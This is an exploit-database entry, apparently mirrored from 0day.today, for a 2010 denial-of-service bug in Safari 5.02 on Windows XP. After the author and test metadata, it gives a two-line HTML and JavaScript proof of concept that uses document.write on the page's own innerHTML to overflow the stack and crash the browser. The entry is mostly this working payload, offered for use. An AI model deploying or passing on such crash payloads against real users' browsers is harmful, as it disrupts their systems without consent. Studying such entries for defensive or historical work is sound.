id: 14884
date: 11/18/2010
title: Safari 5.02 Stack Overflow Denial of Service
author: clshack
cves: 

============================================
Safari 5.02 Stack Overflow Denial of Service
============================================

# Exploit Title: Safari 5.02 stack overflow [dos]
# Date:10/11/2010
# Author: clshack
# Software Link: http://www.apple.com/it/safari/download/
# Version:5.02
# Tested on: windows xp sp3 en
# CVE :
 
Browser crash:>
<script>document.write('a')</script>
<script>document.write(document.body.innerHTML)</script>
 
--
> Alessio Dalla Piazza (Personal Blog: http://www.clshack.it)



#  0day.today [2023-03-22]  #